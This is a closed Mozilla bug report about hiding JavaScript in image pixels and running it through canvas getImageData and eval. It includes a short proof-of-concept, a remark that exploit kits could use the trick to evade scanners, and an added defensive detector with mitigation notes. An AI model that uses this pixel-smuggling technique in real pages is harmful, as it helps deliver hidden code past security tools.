canvas getImageData opens security hole for code

Status: RESOLVED INVALID
Product: Core
Component: General
Reported: 6 years ago
Last modified: 6 years ago
Reporter: Klaus Bertram (Unassigned)
Firefox Tracking Flags: (Not tracked)
Attachments: 1 attachment (716 bytes, application/octet-stream)
Description (Reporter, 6 years ago)

Created attachment 683891: canvas.zip

User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:16.0) Gecko/20100101 Firefox/16.0
Build ID: 20121025210744

Steps to reproduce:

With the canvas it is possible to read byte data out of an image.
Images themselves can come from different URLs (hosts) without restriction.
What happens when someone fills an image with code values as pixel data, loads the image into a canvas and interprets it?
He could execute code without any security prevention knowing about it, because the "code" is an image.
What I've done is simple:
1. create an image where the pixels are the color representation of
  window['alert']('xss')
  this could be a GIF, PNG... It depends on the color interpolation in the resulting image.
2. load the image into a web site
3. create a canvas object and put the image inside.
4. read the byte data of the canvas and cast it to a string for eval
Et voilà

This is a small JS for it:
var img = new Image();
img.onload = function () {
  // Draw the loaded image onto an off-screen canvas of the same size
  var ca = document.createElement('canvas');
  ca.width = this.width;
  ca.height = this.height;
  var ctx = ca.getContext('2d');
  ctx.drawImage(this, 0, 0);
  // Read back the raw RGBA bytes and turn every channel value below 255 into a character
  var a = "", d = ctx.getImageData(0, 0, this.width, this.height).data;
  for (var i = 0; i < d.length; i++) {
    if (d[i] < 255) a += String.fromCharCode(d[i]);
  }
  // The reconstructed string is executed as script
  eval(a);
};
img.src = "exploid.gif";


Actual results:

The alert box is displayed.
Updated (Reporter, 6 years ago)

OS: Linux → All
Hardware: x86_64 → All
Comment 1

6 years ago
Given https://www.w3.org/Bugs/Public/show_bug.cgi?id=20034 this is clearly not security-sensitive.

And further, it's invalid.  The security issue is in calling eval() on untrusted strings, which a web page can get in all sorts of ways, not in getImageData.

Group: core-security
Status: UNCONFIRMED → RESOLVED
Last Resolved: 6 years ago
Resolution: --- → INVALID
Comment 2 (Reporter)

6 years ago
Yes, eval is the real problem. But this way there is no way for any intrusion detection system to scan text and code, because it's in an image.
So for something like the BlackHole kit it would be easier to deliver any code without restriction by any prevention system.
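Comment 2 argues that a scanner cannot see script that arrives as pixel values. The following is an added example, not code from the bug report or from Mozilla, written from the scanning side: it reuses the exact channel-to-character rule the PoC relies on (every RGBA value below 255 becomes one character) and runs a heuristic over the decoded text. The heuristic (printable-ASCII ratio plus a list of script-like identifiers), the helper names, and both sample inputs are assumptions constructed for this example; they are not real image files.

```javascript
// Added example (not part of the bug report): the same byte-to-text
// extraction the PoC performs, reused defensively as a scanner over
// decoded pixel data. All inputs below are constructed, not real images.

// Mirrors the PoC: every RGBA channel value below 255 becomes one character.
function extractHiddenText(data) {
  let out = "";
  for (let i = 0; i < data.length; i++) {
    if (data[i] < 255) out += String.fromCharCode(data[i]);
  }
  return out;
}

// Heuristic (an assumption for this example, not from the page): decoded
// channel bytes that are almost all printable ASCII and contain script-like
// identifiers look like smuggled code rather than picture content.
const SCRIPT_TOKENS = /\b(eval|Function|window|document|alert|fromCharCode|setTimeout)\b/g;

function scoreHiddenText(text) {
  if (text.length === 0) return { printableRatio: 0, tokens: [], suspicious: false };
  let printable = 0;
  for (let i = 0; i < text.length; i++) {
    const c = text.charCodeAt(i);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x09 || c === 0x0a || c === 0x0d) printable++;
  }
  const printableRatio = printable / text.length;
  // Unique script-like identifiers, in order of first appearance
  const tokens = [...new Set(text.match(SCRIPT_TOKENS) || [])];
  return { printableRatio, tokens, suspicious: printableRatio > 0.9 && tokens.length > 0 };
}

// Constructed input: ASCII text packed into the RGB channels, with alpha and
// trailing padding set to 255 so the extractor skips them (the layout the
// PoC assumes).
function textToPixels(text) {
  const bytes = [];
  for (let i = 0; i < text.length; i += 3) {
    for (let k = 0; k < 3; k++) {
      bytes.push(i + k < text.length ? text.charCodeAt(i + k) : 255);
    }
    bytes.push(255); // alpha channel
  }
  return Uint8ClampedArray.from(bytes);
}

// Constructed input standing in for ordinary picture data: a deterministic
// spread over all channel values with no textual structure.
function benignPixels() {
  const bytes = [];
  for (let i = 0; i < 256; i++) bytes.push((i * 37) % 256);
  return Uint8ClampedArray.from(bytes);
}

// Full pipeline: decode the way the PoC does, then score the result.
function scanPixels(data) {
  return scoreHiddenText(extractHiddenText(data));
}

console.log(scanPixels(textToPixels("window['alert']('xss')"))); // suspicious: true
console.log(scanPixels(benignPixels()));                          // suspicious: false
```

The scan only tells a reviewer where to look; the controls that actually stop this class of page are the ones Comment 1 points at. A page that never passes untrusted strings to eval() has nothing to execute, and a Content-Security-Policy whose script-src omits 'unsafe-eval' makes eval() throw an EvalError regardless of where the string came from. Separately, the browser's canvas tainting rule means that drawing a cross-origin image without CORS approval causes getImageData() to throw a SecurityError, so the pixel read-back itself is already restricted for images the page does not control.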